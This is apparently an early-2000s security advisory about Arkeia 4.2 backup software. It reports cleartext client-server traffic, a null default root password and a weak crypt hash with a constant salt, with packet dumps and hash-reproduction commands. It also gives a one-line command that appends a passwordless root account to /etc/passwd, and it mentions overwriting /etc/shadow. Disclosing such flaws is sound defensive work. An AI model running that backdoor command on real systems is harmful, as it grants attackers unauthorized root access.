COMMAND

    Arkeia

SYSTEMS AFFECTED

    Arkeia 4.2

PROBLEM

    Quentyn Taylor found following.  Arkeia simplifies data protection
    by providing automated backup and recovery.  The system supports a
    wide variety of computers, operating systems and storage  devices.
    It is easy to install, configure and use.It is fast, reliable  and
    scales from a few systems to an enterprise.

    The  client-gui  <->  server  communication  is  not  encrypted by
    default  (the  passwords  are  -  see  later)  and  a  wealth   of
    interesting information  is sent  in the  clear.   The information
    sent  by  the  client-gui  could   easily  lead  to  remote   root
    comprimise.

    Client logs into the server in the normal way.  Person sniff's the
    traffic between the client-gui and server.

    Many installations of arkeia will be installed on remote sites and
    controlled  remotely  via  the  client-gui  (available  for   most
    architectures).  The  client-gui appears not  to communicate in  a
    secure  way  with  the  server,  possibly  allowing an attacker to
    compromise an arkeia account.

    By default  the security  options in  /usr/knox/nlp/auth* are  not
    activated.   These  options  do  not  appear  to change encryption
    options.

    Encryption we believe costs extra:

        http://support.arkeia.com/cgi-bin/arkeia/solution?11=000811-0000&130=0965990356&14=&2715=&15=&2716=&57=search&58=&2900=E1KciKRhYN&25=7&3=encryption

    In the default  install /usr/knox/ is  mode 755 (chomoding  to 750
    root:root solves this).  Also  by default the "root" (the  default
    administrator account) account password is set to null

    If this product was installed  in a non secured environment  there
    could be  a "race  condition" to  see who  could set  the password
    first.

    Password is hashed  with the crypt  function with a  constant salt
    (the   characters   "n3")   -   8   character  passwords  maximum.
    Authentication sucess / failure info is sent in the clear.

    License Information - full set  of license information is sent  in
    the clear  (including version,  serial, organization,  Key, expiry
    and type of drive the product is license for).

    Username - Username  and role is  sent in the  clear (so that  you
    know which account to compromise).

    #weak passwords (network packet dumps  from ethreal - xena is  the
    arkeia server):

        0000  00 b0 d0 22 e2 d0 00 b0  d0 78 96 73 08 00 45 00   .°Ð"âÐ.°
        Ðx.s..E.
        0010  00 9b 86 ea 40 00 40 06  2f 47 c0 a8 01 33 c0 a8   ...ê@.@.
        /Gˬ.3ˬ
        0020  01 a8 04 01 02 69 0d 92  7e 0f 1c 9e 41 36 80 18   .¨...i..
        ~...A6..
        0030  29 e0 a9 27 00 00 01 01  08 0a 01 90 10 14 60 b8   )à©'....
        ......`¸
        0040  48 b3 00 69 00 01 00 00  00 5f 4c 00 49 4e 4f 44   H³.i....
        ._L.INOD
        0050  45 00 78 65 6e 61 00 49  50 41 53 53 57 4f 52 44   E.xena.I
        PASSWORD
        0060  00 6e 33 56 32 57 6f 63  58 4d 39 33 41 6b 00 49   .n3V2Woc
        XM93Ak.I
        0070  4e 41 4d 45 00 72 6f 6f  74 00 49 45 4d 41 49 4c   NAME.roo
        t.IEMAIL
        0080  00 61 72 6b 65 69 61 40  66 6f 74 61 6e 67 6f 2e   .arkeia@
        fotango.
        0090  63 6f 6d 00 49 52 4f 4c  45 00 41 44 4d 49 4e 49   com.IROL
        E.ADMINI
        00a0  53 54 52 41 54 4f 52 00  45                        STRATOR. E

    The  above  packet  contains  the  password  "password"  hashed to
    n3V2WocXM93Ak, the  packet below  contains the  password "letmein"
    hashed to n3LGeVp5KwvfE.

        0000  00 b0 d0 22 e2 d0 00 b0  d0 78 96 73 08 00 45 00   .°Ð"âÐ.°
        Ðx.s..E.
        0010  00 63 89 55 40 00 40 06  2d 14 c0 a8 01 33 c0 a8   .c.U@.@.
        -.ˬ.3ˬ
        0020  01 a8 04 01 02 69 e1 07  51 3c ee 26 bc b6 80 18   .¨...iá.
        Q<î&¼¶..
        0030  16 d0 d7 4d 00 00 01 01  08 0a 01 6f d9 fa 60 98   .Ð×M....
        ...oÙú`.
        0040  11 ea 00 61 00 02 00 00  00 27 72 6f 6f 74 00 6e   .ê.a....
        .'root.n
        0050  33 35 56 57 4f 45 55 51  76 57 74 63 00 39 39 37
        n3LGeVp5KwvfE.997
        0060  34 33 35 30 34 37 00 00  00 00 00 00 00 00 00 00   435047..
        ........
        0070  00

    Now if you  look at the  hashes (n3V2WocXM93Ak and  n3LGeVp5KwvfE)
    you notice that  the string n3  appears at the  front.... (this is
    common to all passwords that it sends).

    So lets see how they have encrypted it (crypt?).  So lets try:

        perl -e 'print crypt "password", "n3"'

    gives

        n3V2WocXM93Ak

    and

        perl -e 'print crypt "letmein", "n3"'

    gives

        n3LGeVp5KwvfE

    so there we have it they use crypt with a constant salt of "n3".

    This has been verified with both  the linux gui client and the  MS
    java version (on win2k).

    Problems inherent with this scheme: 8 character max passwords (ie)
    setting the password to (passwordpassword gives):

        0000  00 b0 d0 22 e2 d0 00 b0  d0 78 96 73 08 00 45 00   .°Ð"âÐ.°
        Ðx.s..E.
        0010  00 63 6a 83 40 00 40 06  4b e6 c0 a8 01 33 c0 a8   .cj.@.@.
        KæÀ¨.3À¨
        0020  01 a8 04 01 02 69 e9 4e  1d 1b f6 f2 a5 d0 80 18   .¨...iéN
        ..öò¥Ð..
        0030  16 d0 4c e6 00 00 01 01  08 0a 01 7c 76 ea 60 a4   .ÐLæ....
        ...|vê`¤
        0040  af 1e 00 61 00 02 00 00  00 27 72 6f 6f 74 00 6e   ¯..a....
        .'root.n
        0050  33 56 32 57 6f 63 58 4d  39 33 41 6b 00 39 39 37   3V2WocXM
        93Ak.997
        0060  34 34 33 33 31 33 00 00  00 00 00 00 00 00 00 00   443313..
        ........

    So allthough you may be using passwords >8 for your root passwords
    arkeia (which is a root level service) only uses 8.

    Authentication info sent in the clear + roles listed in the clear:

        0000  00 b0 d0 78 96 73 00 b0  d0 22 e2 d0 08 00 45 00   .°Ðx.s.°
        Ð"âÐ..E.
        0010  01 16 83 77 40 00 40 06  32 3f c0 a8 01 a8 c0 a8   ...w@.@.
        2?À¨.¨À¨
        0020  01 33 02 69 04 01 ee 26  bc eb e1 07 51 a5 80 18   .3.i..î&
        ¼ëá.Q¥..
        0030  fe 88 b2 9c 00 00 01 01  08 0a 60 98 11 ee 01 6f   þ.².....
        ..`..î.o
        0040  d9 ff 00 68 00 01 00 00  00 04 00 00 00 00 00 65   Ùÿ.h....
        .......e
        0050  00 01 00 00 00 66 32 30  30 31 2f 30 38 2f 31 30   .....f20
        01/08/10
        0060  20 31 30 3a 32 31 3a 30  32 20 49 33 30 31 35 30    10:21:0 2
        I30150
        0070  30 32 30 20 55 53 52 5f  56 41 4c 49 44 41 54 45   020 USR_
        VALIDATE
        0080  3a 20 59 6f 75 20 68 61  76 65 20 73 75 63 63 65   : You ha ve
        succe
        0090  73 73 66 75 6c 6c 79 20  6c 6f 61 64 65 64 20 74   ssfully  loaded
        t
        00a0  68 65 20 63 75 72 72 65  6e 74 20 75 73 65 72 20   he curre nt
        user
        00b0  69 6e 66 6f 72 6d 61 74  69 6f 6e 00 00 69 00 01   informat
        ion..i..
        00c0  00 00 00 60 4c 00 54 50  4e 41 4d 45 00 72 6f 6f   ...`L.TP
        NAME.roo
        00d0  74 00 50 52 4f 4c 45 00  41 44 4d 49 4e 49 53 54   t.PROLE.
        ADMINIST
        00e0  52 41 54 4f 52 00 50 50  41 53 53 57 4f 52 44 00   RATOR.PP
        ASSWORD.
        00f0  6e 33 35 56 57 4f 45 55  51 76 57 74 63 00 50 4e   n35VWOEU
        QvWtc.PN
        0100  4f 44 45 00 78 65 6e 61  00 50 45 4d 41 49 4c 00   ODE.xena
        .PEMAIL.
        0110  61 72 6b 65 69 61 40 66  6f 74 61 6e 67 6f 2e 63   arkeia@f
        otango.c
        0120  6f 6d 00 45
        om.E

    Notice the password just when past again.

    License Information (the actual license numbers have been removed)

        0000  00 b0 d0 78 96 73 00 b0  d0 22 e2 d0 08 00 45 00   .°Ðx.s.°
        Ð"âÐ..E.
        0010  01 40 83 87 40 00 40 06  32 05 c0 a8 01 a8 c0 a8   .@..@.@.
        2.À¨.¨À¨
        0020  01 33 02 69 04 01 ee 26  bd fa e1 07 51 f0 80 18   .3.i..î&
        ½úá.Qð..
        0030  fe 88 d2 ee 00 00 01 01  08 0a 60 98 11 fa 01 6f   þ.Òî....
        ..`..ú.o
        0040  da 0b 00 68 00 01 00 00  00 04 00 00 00 00 00 65   Ú..h....
        .......e
        0050  00 01 00 00 00 5b 32 30  30 31 2f 30 38 2f 31 30   .....[20
        01/08/10
        0060  20 31 30 3a 32 31 3a 30  32 20 57 33 30 31 35 30    10:21:0 2
        W30150
        0070  31 33 30 20 4c 49 43 45  4e 53 45 5f 47 45 54 3a   130 LICE
        NSE_GET:
        0080  20 54 68 69 73 20 76 65  72 73 69 6f 6e 20 6f 66    This ve rsion
        of
        0090  20 41 72 6b 65 69 61 20  69 73 20 6c 69 63 65 6e    Arkeia  is
        licen
        00a0  73 65 64 20 74 6f 20 27  46 4f 54 41 4e 47 4f 27   sed to '
        FOTANGO'
        00b0  00 00 69 00 01 00 00 00  95 4c 00 49 4c 49 43 45   ..i.....
        .L.ILICE
        00c0  4e 53 45 00 41 52 4b 34  32 00 49 53 45 52 49 41   NSE.ARK4
        2.ISERIA
        00d0  4c 00 54 45 39 32 47 52  31 48 52 48 4e 44 50 4e   ${OUR SERIAL}
        00e0  00 49 4f 52 47 41 4e 49  53 41 54 49 4f 4e 00 46   .IORGANI
        SATION.F
        00f0  4f 54 41 4e 47 4f 00 49  4b 45 59 00 58 58 58 55   OTANGO.I
        KEY.${OUR KEY}
        0100  33 58 45 35 59 4e 38 56  34 33 00 49 4f 50 54 49
        43.IOPTI
        0110  4f 4e 00 35 33 00 49 45  58 50 49 52 59 00 30 00   ON.53.IE
        XPIRY.0.
        0120  49 44 52 49 56 45 00 32  00 49 46 4c 4f 57 34 00   IDRIVE.2
        .IFLOW4.
        0130  32 00 49 46 4c 4f 57 33  00 30 00 49 46 4c 4f 57   2.IFLOW3
        .0.IFLOW
        0140  32 00 35 00 49 46 4c 4f  57 31 00 32 00 45         2.5.IFLO
        W1.2.E

    As you  can see  above, the  license number,  serial, name, No. of
    flows, and the key (some thing that they tell you to keep safe).

    Because the salt is known and because the max password length is 8
    characters it would  not  be  beyond the realms  of possibility to
    crack the  password (effectively  a root  password) once  you have
    access through  the gui,  you have  the possibility  of running  a
    command  from  the  gui  before  and  after  the backup job.  This
    command is run as  root and can be  anything.  Therefore you  have
    full access to the box to do  with as you please.  However, it  is
    only an arkeia "root" password.  It's not even a real user with  a
    shell.  Make sure your system root password is different from your
    arkeia root password.

    Running a command is easy,  go into the advanced options  and tell
    it to run:

        echo "r00t::0:0:root:/root:/bin/bash" >> /etc/passwd

    A DoS situation  could occur if  you restored a  file over another
    (any file over /etc/shadow) however with full shell access to  the
    server why bother ?

SOLUTION

    Turn on encryption - costs more money and we are not sure that the
    client (GUI client) supports it (certainly none of the ones looked
    - Linux) so even  if you  can  encrypt the data being sent  to the
    server (the actual data being  sent to tape) it doesn't  look like
    the gui client can support it.

    Use an SSH tunnel.

    Use Arkeia only over "trusted" networks.

    This article on  arkeia's support site  explains how to  set up an
    ssh tunnel through a firewall for arkeia:

        http://support.arkeia.com/cgi-bin/arkeia/solution?11=000322-0014&130=0953783453&14=&2715=&15=&2716=&57=search&58=&2900=JP9cQm9m9p&25=7&3=ssh

    Use Legato Networker ;)